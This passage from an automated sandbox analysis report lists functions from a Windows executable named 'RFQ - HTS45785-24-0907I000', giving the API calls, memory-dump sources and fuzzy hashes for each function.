                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                                                        • Instruction ID: c6101d665a98d140be62f029472ab7f8db1b0ce4c02a7c647e8453833b83309f
                                                        • Opcode Fuzzy Hash: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                                                        • Instruction Fuzzy Hash: 5F21B672204110ABEB108F699C85B6F7798EB49370F24463BF625C62E0DB74D8C1C76D
                                                        Function 00471A38 Relevance: 9.1, APIs: 6, Instructions: 79windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 00471A45
                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,?,00000000,?,00000001), ref: 00471A86
                                                        • SendMessageW.USER32(?,00001303,00000000,00000000), ref: 00471AA8
                                                        • ImageList_ReplaceIcon.COMCTL32(?,?,?,?,00000000,?,00000001), ref: 00471ABF
                                                        • SendMessageW.USER32 ref: 00471AE3
                                                        • DestroyIcon.USER32(?), ref: 00471AF4
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: Icon$ImageList_MessageSend$CreateDestroyExtractReplace
                                                        • String ID:
                                                        • API String ID: 3611059338-0
                                                        • Opcode ID: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
                                                        • Instruction ID: ff529b192773d28f9e5fe2f6f8d7a9043cb056f7fe4a3f7912da33dbd9270a4a
                                                        • Opcode Fuzzy Hash: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
                                                        • Instruction Fuzzy Hash: FB21AB71600204AFEB10CF64DD85FAA73B5FF88700F10846EFA05AB290DBB4A9428B64
                                                        Function 00455616 Relevance: 9.1, APIs: 6, Instructions: 78windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: DestroyWindow$DeleteObject$IconMove
                                                        • String ID:
                                                        • API String ID: 1640429340-0
                                                        • Opcode ID: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
                                                        • Instruction ID: 1af524ae86da71fe4f89171a472fc693caa25f853ed14bd6ff7d4c509651bbe6
                                                        • Opcode Fuzzy Hash: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
                                                        • Instruction Fuzzy Hash: C6311874200A41DFC710DF24D9D8B3A77E9FB48712F0445AAE946CB262D778E848CB69
                                                        Function 0044389A Relevance: 9.1, APIs: 6, Instructions: 76COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                          • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                        • _wcslen.LIBCMT ref: 004438CD
                                                        • _wcslen.LIBCMT ref: 004438E6
                                                        • _wcstok.LIBCMT ref: 004438F8
                                                        • _wcslen.LIBCMT ref: 0044390C
                                                        • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 0044391A
                                                        • _wcstok.LIBCMT ref: 00443931
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: _wcslen$_wcstok$ExtentPoint32Text_wcscpy
                                                        • String ID:
                                                        • API String ID: 3632110297-0
                                                        • Opcode ID: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                                                        • Instruction ID: d12b8bce329459066c03420e1b0c57cf331e6d1a2def9435cce8fb2ce1fb425a
                                                        • Opcode Fuzzy Hash: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                                                        • Instruction Fuzzy Hash: 9621B072900305ABDB10AF559C82AAFB7F8FF48711F64482EF95993301E678EA5087A5
                                                        Function 00455168 Relevance: 9.1, APIs: 6, Instructions: 75windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: Destroy$DeleteMenuObject$IconWindow
                                                        • String ID:
                                                        • API String ID: 752480666-0
                                                        • Opcode ID: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
                                                        • Instruction ID: 7b220c8407ffc283b2c26cc65a644285b0b18e1ed163c7e0472fb9f2b18bc557
                                                        • Opcode Fuzzy Hash: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
                                                        • Instruction Fuzzy Hash: B7215970600A01DFD714DF29D9E8B3A7BA9BF49312F04855AE8468B352C738EC89CB59
                                                        Function 004552FA Relevance: 9.1, APIs: 6, Instructions: 72windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                                        • String ID:
                                                        • API String ID: 3275902921-0
                                                        • Opcode ID: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
                                                        • Instruction ID: 11d86efc281b6c380d974b68bd8b9632be9d9c574e85584f431c859402bfc888
                                                        • Opcode Fuzzy Hash: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
                                                        • Instruction Fuzzy Hash: 9C217C70200A01DFC714DF39D998A6AB7E4BF49311F10862EE959C7392D778D845CB58
                                                        Function 004556C8 Relevance: 9.1, APIs: 6, Instructions: 67windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                                        • String ID:
                                                        • API String ID: 3275902921-0
                                                        • Opcode ID: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
                                                        • Instruction ID: f2615e71845bffb995fe2c2b9381f89f67980fa6d4eb7dd8f13843e5971e4781
                                                        • Opcode Fuzzy Hash: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
                                                        • Instruction Fuzzy Hash: 54213D70200A01DFD710EF25D9D4A2B37E9BF49312F10896EE945CB352D739D845CB69
                                                        Function 004331A2 Relevance: 9.1, APIs: 6, Instructions: 64sleepCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                                        • QueryPerformanceCounter.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331D4
                                                        • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331DE
                                                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331E6
                                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331F0
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: PerformanceQuery$CounterSleep$Frequency
                                                        • String ID:
                                                        • API String ID: 2833360925-0
                                                        • Opcode ID: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                                                        • Instruction ID: f8c058edd9890a080c9b5d5c764251204f1987641da473bf5ecf7e3e358c806a
                                                        • Opcode Fuzzy Hash: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                                                        • Instruction Fuzzy Hash: 1911B632D0011DABCF00DFD9EA489EEB778FF49722F1145AAED04A6204DB755A01CBA4
                                                        Function 004555A8 Relevance: 9.1, APIs: 6, Instructions: 61windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SendMessageW.USER32 ref: 004555C7
                                                        • SendMessageW.USER32(?,00001008,00000000,00000000), ref: 004555E2
                                                        • DeleteObject.GDI32(?), ref: 00455736
                                                        • DeleteObject.GDI32(?), ref: 00455744
                                                        • DestroyIcon.USER32(?), ref: 00455752
                                                        • DestroyWindow.USER32(?), ref: 00455760
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: DeleteDestroyMessageObjectSend$IconWindow
                                                        • String ID:
                                                        • API String ID: 3691411573-0
                                                        • Opcode ID: a36765697229ff4e213bf7548d3c220621229afc2c11469716cb0ded27b8d901
                                                        • Instruction ID: 7bbaf3a525edecc9c7f674a1bc178dbce74773f27e06def1294b58b6a87c9b54
                                                        • Opcode Fuzzy Hash: a36765697229ff4e213bf7548d3c220621229afc2c11469716cb0ded27b8d901
                                                        • Instruction Fuzzy Hash: 3D116071204601DBC710DF69EDC8A2A77A8FB58322F10466AFD10DB292D779D849CB68
                                                        Function 00447275 Relevance: 9.0, APIs: 6, Instructions: 50COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                          • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                          • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                          • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                          • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                        • MoveToEx.GDI32(?,?,?,00000000), ref: 004472A0
                                                        • LineTo.GDI32(?,?,?), ref: 004472AC
                                                        • MoveToEx.GDI32(?,?,?,00000000), ref: 004472BA
                                                        • LineTo.GDI32(?,?,?), ref: 004472C6
                                                        • EndPath.GDI32(?), ref: 004472D6
                                                        • StrokePath.GDI32(?), ref: 004472E4
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: ObjectPath$LineMoveSelect$BeginCreateDeleteStroke
                                                        • String ID:
                                                        • API String ID: 372113273-0
                                                        • Opcode ID: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
                                                        • Instruction ID: 9972a7b2ea06d4c5ad2b855a17b8a9a0d98d12ec42d2644493c4a69bc6448ed6
                                                        • Opcode Fuzzy Hash: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
                                                        • Instruction Fuzzy Hash: 7701BC76101214BBE3119B44ED8DFDF7B6CEF4A710F104259FA01A629187F42A02CBBD
                                                        Function 0044CC51 Relevance: 9.0, APIs: 6, Instructions: 50COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetDC.USER32(00000000), ref: 0044CC6D
                                                        • GetDeviceCaps.GDI32(00000000,00000058), ref: 0044CC78
                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0044CC84
                                                        • ReleaseDC.USER32(00000000,00000000), ref: 0044CC90
                                                        • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCA8
                                                        • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCB9
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: CapsDevice$Release
                                                        • String ID:
                                                        • API String ID: 1035833867-0
                                                        • Opcode ID: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
                                                        • Instruction ID: 48d0fedbc9b5ed1f8cca1220e36c4d83aa6571d18a2c693a8c9b468b660f0fbb
                                                        • Opcode Fuzzy Hash: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
                                                        • Instruction Fuzzy Hash: 60015276240214BFFB009F95DD89F5A7BACFF54751F14802EFF089B240D6B098008BA4
                                                        Function 00417082 Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • __getptd.LIBCMT ref: 0041708E
                                                          • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                                                          • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                                                        • __amsg_exit.LIBCMT ref: 004170AE
                                                        • __lock.LIBCMT ref: 004170BE
                                                        • InterlockedDecrement.KERNEL32(?), ref: 004170DB
                                                        • _free.LIBCMT ref: 004170EE
                                                        • InterlockedIncrement.KERNEL32(03012CF8), ref: 00417106
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                        • String ID:
                                                        • API String ID: 3470314060-0
                                                        • Opcode ID: 80714434994c9102abdbbcfc383ede657addd51ae4f203e3d2298efcf25a3187
                                                        • Instruction ID: d92c7102fc6d098775a0f5363b9b5483e5b10d08a1c29475ed017091780ded1e
                                                        • Opcode Fuzzy Hash: 80714434994c9102abdbbcfc383ede657addd51ae4f203e3d2298efcf25a3187
                                                        • Instruction Fuzzy Hash: 3301AD32905711ABC721ABA698497DE7BB0AB04724F15416BF950A7381CB3CAAC1CFDD
                                                        Function 0044B63B Relevance: 9.0, APIs: 6, Instructions: 40synchronizationthreadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • InterlockedExchange.KERNEL32(?,?), ref: 0044B655
                                                        • EnterCriticalSection.KERNEL32(?), ref: 0044B666
                                                        • TerminateThread.KERNEL32(?,000001F6), ref: 0044B674
                                                        • WaitForSingleObject.KERNEL32(?,000003E8,?,000001F6), ref: 0044B682
                                                          • Part of subcall function 00432614: CloseHandle.KERNEL32(00000000,00000000,?,0044B68E,00000000,?,000003E8,?,000001F6), ref: 00432622
                                                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B697
                                                        • LeaveCriticalSection.KERNEL32(?), ref: 0044B69E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                        • String ID:
                                                        • API String ID: 3495660284-0
                                                        • Opcode ID: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                                                        • Instruction ID: c0d5b59c8b9084ef0a5212f46b36de0b3fb5a8468090cd03c061fc2099eb7203
                                                        • Opcode Fuzzy Hash: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                                                        • Instruction Fuzzy Hash: A8F0AF72141201BBD210AB64EE8CDAFB77CFF88311F40092AFA0192560CBB4E420CBB6
                                                        Function 00410AB0 Relevance: 9.0, APIs: 6, Instructions: 40keyboardCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00410AE8
                                                        • MapVirtualKeyW.USER32(00000010,00000000), ref: 00410AF0
                                                        • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00410AFB
                                                        • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00410B06
                                                        • MapVirtualKeyW.USER32(00000011,00000000), ref: 00410B0E
                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00410B16
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: Virtual
                                                        • String ID:
                                                        • API String ID: 4278518827-0
                                                        • Opcode ID: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
                                                        • Instruction ID: ec5b0e47a8727e2ef01e8325cfcf1e1c5a721ad9102a6d662b709b351e7b749c
                                                        • Opcode Fuzzy Hash: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
                                                        • Instruction Fuzzy Hash: 79016770106B88ADD3309F668C84B47FFF8EF95704F01491DD1D507A52C6B5A84CCB69
                                                        Function 004151BB Relevance: 9.0, APIs: 6, Instructions: 29threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ___set_flsgetvalue.LIBCMT ref: 004151C0
                                                          • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                          • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                        • ___fls_getvalue@4.LIBCMT ref: 004151CB
                                                          • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                        • ___fls_setvalue@8.LIBCMT ref: 004151DD
                                                        • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
